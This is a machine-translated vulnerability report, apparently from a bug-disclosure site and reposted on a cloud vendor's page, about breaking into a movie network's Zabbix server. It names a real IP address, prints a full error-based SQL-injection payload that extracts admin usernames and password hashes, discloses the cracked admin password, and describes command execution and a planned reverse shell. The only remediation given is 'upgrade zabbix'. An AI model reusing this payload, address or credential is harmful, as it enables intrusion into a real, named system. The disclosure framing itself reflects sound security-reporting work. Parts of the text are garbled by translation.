M1905 Command Execution caused by zabbix injection on a website of movie Network

Source: Internet
Author: User

M1905 Command Execution caused by zabbix injection on a website of movie Network

Rt

 

http://118.145.26.196/zabbix/index.php



The zabbix version is too low. I remember there was a front-end injection hole in the past, so I typed it with exp.

Http: // 118.145.26.196/zabbix/httpmon. php? Applications = 2 and (select 1 from (select count (*), concat (select concat (cast (concat (alias, 0x7e, passwd, 0x7e) as char ), 0x7e) from zabbix. users LIMIT 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x))
 



After decryption, log on to the admin/M1905 & 2014 successfully. The figure shows that it is the ding of the movie network.
 



Zabbix permission.
 








 

With Intranet ip Address
 



We can raise the right by making a rebound and continue to deepen our work. After reading the kernel version, the exp cannot be found...
 

Solution:

Upgrade zabbix. The version is too low. Fortunately, the permission control is quite dead.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.